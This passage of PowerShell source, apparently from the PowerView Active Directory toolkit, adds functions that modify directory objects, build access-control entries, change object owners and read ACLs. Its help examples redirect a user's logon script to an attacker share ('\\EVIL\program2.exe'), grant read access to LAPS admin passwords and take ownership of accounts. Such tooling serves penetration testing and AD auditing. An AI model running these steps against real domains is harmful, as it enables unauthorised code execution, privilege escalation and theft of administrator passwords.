+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser)))) +VERBOSE: [Set-DomainObject] Setting 'scriptpath' to '\\EVIL\program2.exe' for object 'testuser' + +Get-DomainUser -Identity testuser -Properties scriptpath + +scriptpath +---------- +\\EVIL\program2.exe +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] 
+ $Identity, + + [ValidateNotNullOrEmpty()] + [Alias('Replace')] + [Hashtable] + $Set, + + [ValidateNotNullOrEmpty()] + [Hashtable] + $XOR, + + [ValidateNotNullOrEmpty()] + [String[]] + $Clear, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{'Raw' = $True} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + # splat the appropriate arguments to Get-DomainObject + $RawObject = Get-DomainObject @SearcherArguments + + ForEach ($Object in $RawObject) { + 
+ $Entry = $RawObject.GetDirectoryEntry() + + if($PSBoundParameters['Set']) { + try { + $PSBoundParameters['Set'].GetEnumerator() | ForEach-Object { + Write-Verbose "[Set-DomainObject] Setting '$($_.Name)' to '$($_.Value)' for object '$($RawObject.Properties.samaccountname)'" + $Entry.put($_.Name, $_.Value) + } + $Entry.commitchanges() + } + catch { + Write-Warning "[Set-DomainObject] Error setting/replacing properties for object '$($RawObject.Properties.samaccountname)' : $_" + } + } + if($PSBoundParameters['XOR']) { + try { + $PSBoundParameters['XOR'].GetEnumerator() | ForEach-Object { + $PropertyName = $_.Name + $PropertyXorValue = $_.Value + Write-Verbose "[Set-DomainObject] XORing '$PropertyName' with '$PropertyXorValue' for object '$($RawObject.Properties.samaccountname)'" + $TypeName = $Entry.$PropertyName[0].GetType().name + + # UAC value references- https://support.microsoft.com/en-us/kb/305144 + $PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue + $Entry.$PropertyName = $PropertyValue -as $TypeName + } + $Entry.commitchanges() + } + catch { + Write-Warning "[Set-DomainObject] Error XOR'ing properties for object '$($RawObject.Properties.samaccountname)' : $_" + } + } + if($PSBoundParameters['Clear']) { + try { + $PSBoundParameters['Clear'] | ForEach-Object { + $PropertyName = $_ + Write-Verbose "[Set-DomainObject] Clearing '$PropertyName' for object '$($RawObject.Properties.samaccountname)'" + $Entry.$PropertyName.clear() + } + $Entry.commitchanges() + } + catch { + Write-Warning "[Set-DomainObject] Error clearing properties for object '$($RawObject.Properties.samaccountname)' : $_" + } + } + } + } +} + + +function ConvertFrom-LDAPLogonHours { +<# +.SYNOPSIS + +Converts the LDAP LogonHours array to a processible object. + +Author: Lee Christensen (@tifkin_) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Converts the LDAP LogonHours array to a processible object. 
Each entry +property in the output object corresponds to a day of the week and hour during +the day (in UTC) indicating whether or not the user can logon at the specified +hour. + +.PARAMETER LogonHoursArray + +21-byte LDAP hours array. + +.EXAMPLE + +$hours = (Get-DomainUser -LDAPFilter 'userworkstations=*')[0].logonhours +ConvertFrom-LDAPLogonHours $hours + +Gets the logonhours array from the first AD user with logon restrictions. + +.OUTPUTS + +PowerView.LogonHours +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LogonHours')] + [CmdletBinding()] + Param ( + [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [byte[]] + $LogonHoursArray + ) + + Begin { + if($LogonHoursArray.Count -ne 21) { + throw "LogonHoursArray is the incorrect length" + } + + function ConvertTo-LogonHoursArray { + Param ( + [int[]] + $HoursArr + ) + + $LogonHours = New-Object bool[] 24 + for($i=0; $i -lt 3; $i++) { + $Byte = $HoursArr[$i] + $Offset = $i * 8 + $Str = [Convert]::ToString($Byte,2).PadLeft(8,'0') + + $LogonHours[$Offset+0] = [bool] [convert]::ToInt32([string]$Str[7]) + $LogonHours[$Offset+1] = [bool] [convert]::ToInt32([string]$Str[6]) + $LogonHours[$Offset+2] = [bool] [convert]::ToInt32([string]$Str[5]) + $LogonHours[$Offset+3] = [bool] [convert]::ToInt32([string]$Str[4]) + $LogonHours[$Offset+4] = [bool] [convert]::ToInt32([string]$Str[3]) + $LogonHours[$Offset+5] = [bool] [convert]::ToInt32([string]$Str[2]) + $LogonHours[$Offset+6] = [bool] [convert]::ToInt32([string]$Str[1]) + $LogonHours[$Offset+7] = [bool] [convert]::ToInt32([string]$Str[0]) + } + + $LogonHours + } + } + + Process { + $Output = @{ + Sunday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[0..2] + Monday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[3..5] + Tuesday = 
ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[6..8] + Wednesday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[9..11] + Thurs = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[12..14] + Friday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[15..17] + Saturday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[18..20] + } + + $Output = New-Object PSObject -Property $Output + $Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonHours') + $Output + } +} + + +function New-ADObjectAccessControlEntry { +<# +.SYNOPSIS + +Creates a new Active Directory object-specific access control entry. + +Author: Lee Christensen (@tifkin_) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Creates a new object-specific access control entry (ACE). The ACE could be +used for auditing access to an object or controlling access to objects. + +.PARAMETER PrincipalIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain principal to add for the ACL. Required. Wildcards accepted. + +.PARAMETER PrincipalDomain + +Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain. + +.PARAMETER PrincipalSearchBase + +The LDAP source to search through for principals, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. 
Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Right + +Specifies the rights set on the Active Directory object. + +.PARAMETER AccessControlType + +Specifies the type of ACE (allow or deny) + +.PARAMETER AuditFlag + +For audit ACEs, specifies when to create an audit log (on success or failure) + +.PARAMETER ObjectType + +Specifies the GUID of the object that the ACE applies to. + +.PARAMETER InheritanceType + +Specifies how the ACE applies to the object and/or its children. + +.PARAMETER InheritedObjectType + +Specifies the type of object that can inherit the ACE. + +.EXAMPLE + +$Guids = Get-DomainGUIDMap +$AdmPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'ms-Mcs-AdmPwd'} | select -ExpandProperty name +$CompPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'Computer'} | select -ExpandProperty name +$ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity itadmin -Right ExtendedRight,ReadProperty -AccessControlType Allow -ObjectType $AdmPropertyGuid -InheritanceType All -InheritedObjectType $CompPropertyGuid +$OU = Get-DomainOU -Raw Workstations +$DsEntry = $OU.GetDirectoryEntry() +$dsEntry.PsBase.Options.SecurityMasks = 'Dacl' +$dsEntry.PsBase.ObjectSecurity.AddAccessRule($ACE) +$dsEntry.PsBase.CommitChanges() + +Adds an ACE to all computer objects in the OU "Workstations" permitting the +user "itadmin" to read the confidential ms-Mcs-AdmPwd computer property. 
+ +.OUTPUTS + +System.Security.AccessControl.AuthorizationRule +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.Security.AccessControl.AuthorizationRule')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True, Mandatory = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String] + $PrincipalIdentity, + + [ValidateNotNullOrEmpty()] + [String] + $PrincipalDomain, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $True)] + [ValidateSet('AccessSystemSecurity', 'CreateChild','Delete','DeleteChild','DeleteTree','ExtendedRight','GenericAll','GenericExecute','GenericRead','GenericWrite','ListChildren','ListObject','ReadControl','ReadProperty','Self','Synchronize','WriteDacl','WriteOwner','WriteProperty')] + $Right, + + [Parameter(Mandatory = $True, ParameterSetName='AccessRuleType')] + [ValidateSet('Allow', 'Deny')] + [String[]] + $AccessControlType, + + [Parameter(Mandatory = $True, ParameterSetName='AuditRuleType')] + [ValidateSet('Success', 'Failure')] + [String] + $AuditFlag, + + [Parameter(Mandatory = $False, ParameterSetName='AccessRuleType')] + [Parameter(Mandatory = $False, ParameterSetName='AuditRuleType')] + [Parameter(Mandatory = $False, ParameterSetName='ObjectGuidLookup')] + [Guid] + $ObjectType, + + [ValidateSet('All', 'Children','Descendents','None','SelfAndChildren')] + 
[String] + $InheritanceType, + + [Guid] + $InheritedObjectType + ) + + Begin { + if ($PrincipalIdentity -notmatch '^S-1-.*') { + $PrincipalSearcherArguments = @{ + 'Identity' = $PrincipalIdentity + 'Properties' = 'distinguishedname,objectsid' + } + if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain } + if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential } + $Principal = Get-DomainObject @PrincipalSearcherArguments + if (-not $Principal) { + throw "Unable to resolve principal: $PrincipalIdentity" + } + elseif($Principal.Count -gt 1) { + throw "PrincipalIdentity matches multiple AD objects, but only one is allowed" + } + $ObjectSid = $Principal.objectsid + } + else { + $ObjectSid = $PrincipalIdentity + } + + $ADRight = 0 + foreach($r in $Right) { + $ADRight = $ADRight -bor (([System.DirectoryServices.ActiveDirectoryRights]$r).value__) + } + $ADRight = [System.DirectoryServices.ActiveDirectoryRights]$ADRight + + $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$ObjectSid) + } + + Process { + if($PSCmdlet.ParameterSetName -eq 'AuditRuleType') { + + if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag + } elseif($ObjectType -eq $null -and $InheritanceType 
-ne [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType) + } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType + } elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType + } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType + } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) { + New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType, $InheritedObjectType + } + + } + else { + + if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType + } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) { + New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType) + } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and 
$InheritedObjectType -ne $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType
+ } elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType
+ } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType
+ } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {
+ New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType, $InheritedObjectType
+ }
+
+ }
+ }
+}
+
+
+function Set-DomainObjectOwner {
+<#
+.SYNOPSIS
+
+Modifies the owner for a specified active directory object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+.DESCRIPTION
+
+Retrieves the Active Directory object specified by -Identity by splatting to
+Get-DomainObject, returning the raw searchresult object. Retrieves the raw
+directoryentry for the object, and sets the object owner to -OwnerIdentity.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+of the AD object to set the owner for.
+
+.PARAMETER OwnerIdentity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+of the owner to set for -Identity.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
+
+Set the owner of 'dfm' in the current domain to 'harmj0y'.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred
+
+Set the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+ [String]
+ $Identity,
+
+ [Parameter(Mandatory = $True)]
+ [ValidateNotNullOrEmpty()]
+ [Alias('Owner')]
+ [String]
+ $OwnerIdentity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if
($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ $OwnerSid = Get-DomainObject @SearcherArguments -Identity $OwnerIdentity -Properties objectsid | Select-Object -ExpandProperty objectsid
+ if ($OwnerSid) {
+ $OwnerIdentityReference = [System.Security.Principal.SecurityIdentifier]$OwnerSid
+ }
+ else {
+ Write-Warning "[Set-DomainObjectOwner] Error parsing owner identity '$OwnerIdentity'"
+ }
+ }
+
+ PROCESS {
+ if ($OwnerIdentityReference) {
+ $SearcherArguments['Raw'] = $True
+ $SearcherArguments['Identity'] = $Identity
+
+ # splat the appropriate arguments to Get-DomainObject
+ $RawObject = Get-DomainObject @SearcherArguments
+
+ ForEach ($Object in $RawObject) {
+ try {
+ Write-Verbose "[Set-DomainObjectOwner] Attempting to set the owner for '$Identity' to '$OwnerIdentity'"
+ $Entry = $RawObject.GetDirectoryEntry()
+ $Entry.PsBase.Options.SecurityMasks = 'Owner'
+ $Entry.PsBase.ObjectSecurity.SetOwner($OwnerIdentityReference)
+ $Entry.PsBase.CommitChanges()
+ }
+ catch {
+ Write-Warning "[Set-DomainObjectOwner] Error setting owner: $_"
+ }
+ }
+ }
+ }
+}
+
+
+function Get-DomainObjectAcl {
+<#
+.SYNOPSIS
+
+Returns the ACLs associated with a specific active directory object. By default
+the DACL for the object(s) is returned, but the SACL can be returned with -Sacl.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainGUIDMap
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+.PARAMETER Sacl
+
+Switch. Return the SACL instead of the DACL for the object (default behavior).
+
+.PARAMETER ResolveGUIDs
+
+Switch. Resolve GUIDs to their display names.
+
+.PARAMETER RightsFilter
+
+A specific set of rights to return ('All', 'ResetPassword', 'WriteMembers').
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs
+
+Get the ACLs for the matt.admin user in the testlab.local domain and
+resolve relevant GUIDs to their display names.
+
+.EXAMPLE
+
+Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs
+
+Enumerate the ACL permissions for all OUs in the domain.
+
+.EXAMPLE
+
+Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs -Sacl
+
+Enumerate the SACLs for all OUs in the domain, resolving GUIDs.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainObjectAcl -Credential $Cred -ResolveGUIDs
+
+.OUTPUTS
+
+PowerView.ACL
+
+Custom PSObject with ACL entries.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.ACL')]
+ [CmdletBinding()]
+ Param (
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+ [String[]]
+ $Identity,
+
+ [Switch]
+ $Sacl,
+
+ [Switch]
+ $ResolveGUIDs,
+
+ [String]
+ [Alias('Rights')]
+ [ValidateSet('All', 'ResetPassword', 'WriteMembers')]
+ $RightsFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $SearcherArguments = @{
+ 'Properties' = 'samaccountname,ntsecuritydescriptor,distinguishedname,objectsid'
+ }
+
+ if ($PSBoundParameters['Sacl']) {
+ $SearcherArguments['SecurityMasks'] = 'Sacl'
+ }
+ else {
+ $SearcherArguments['SecurityMasks'] = 'Dacl'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if
($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $Searcher = Get-DomainSearcher @SearcherArguments
+
+ $DomainGUIDMapArguments = @{}
+ if ($PSBoundParameters['Domain']) { $DomainGUIDMapArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $DomainGUIDMapArguments['Server'] = $Server }
+ if ($PSBoundParameters['ResultPageSize']) { $DomainGUIDMapArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $DomainGUIDMapArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Credential']) { $DomainGUIDMapArguments['Credential'] = $Credential }
+
+ # get a GUID -> name mapping
+ if ($PSBoundParameters['ResolveGUIDs']) {
+ $GUIDs = Get-DomainGUIDMap @DomainGUIDMapArguments
+ }
+ }
+
+ PROCESS {
+ if ($Searcher) {
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^S-1-.*') {
+ $IdentityFilter += "(objectsid=$IdentityInstance)"
+ }
+ elseif ($IdentityInstance -match '^(CN|OU|DC)=.*') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
